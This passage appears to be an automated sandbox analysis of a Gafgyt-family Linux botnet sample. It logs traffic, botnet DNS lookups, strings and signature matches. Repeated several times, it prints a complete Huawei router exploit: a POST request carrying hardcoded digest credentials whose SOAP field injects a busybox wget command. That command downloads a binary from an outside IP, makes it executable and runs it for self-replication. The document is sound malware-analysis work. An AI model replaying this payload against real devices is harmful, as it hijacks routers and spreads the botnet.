64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: unknownDNS traffic detected: query: botnet.4gnekoland.top replaycode: Server failure (2)
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.52.148.255
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.237.191.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.38.89.252
                  Source: unknownTCP traffic detected without corresponding DNS query: 181.43.141.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.19.102.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 217.215.170.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.149.31.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.81.140.211
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.160.68.204
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.22.102.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.97.26.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.43.127.239
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.46.158.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 78.175.246.179
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.255.200.41
                  Source: unknownTCP traffic detected without corresponding DNS query: 163.220.137.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 86.66.209.176
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.39.137.30
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.141.214.50
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.155.106.175
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.47.174.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.17.4.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 36.89.146.41
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.15.250.58
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.49.2.45
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.245.176.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.97.220.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 42.35.195.126
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.55.170.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.200.4.198
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.67.177.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.112.115.182
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.137.42.15
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.40.208.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.212.255.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.192.147.18
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.102.47.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.65.101.179
                  Source: unknownTCP traffic detected without corresponding DNS query: 72.22.180.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.105.180.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.190.126.188
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.236.227.34
                  Source: unknownTCP traffic detected without corresponding DNS query: 75.47.157.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.163.251.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.124.220.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.95.87.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.158.71.242
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.42.220.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.74.61.205
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.133.30.24
                  Source: global trafficDNS traffic detected: DNS query: botnet.4gnekoland.top
                  Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: c0m5xRfolz.elfString found in binary or memory: http://15.235.209.194/tajma.mpsl;
                  Source: c0m5xRfolz.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: c0m5xRfolz.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

                  System Summary

                  barindex
                  Source: c0m5xRfolz.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: c0m5xRfolz.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: Process Memory Space: c0m5xRfolz.elf PID: 5490, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: Process Memory Space: c0m5xRfolz.elf PID: 5490, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox/
                  Source: Initial sampleString containing 'busybox' found: busybox
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljneegay.armskyljneegay.arm5skyljneegay.arm6skyljneegay.arm7skyljneegay.mipsskyljneegay.mpslskyljneegay.x86_64skyljneegay.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
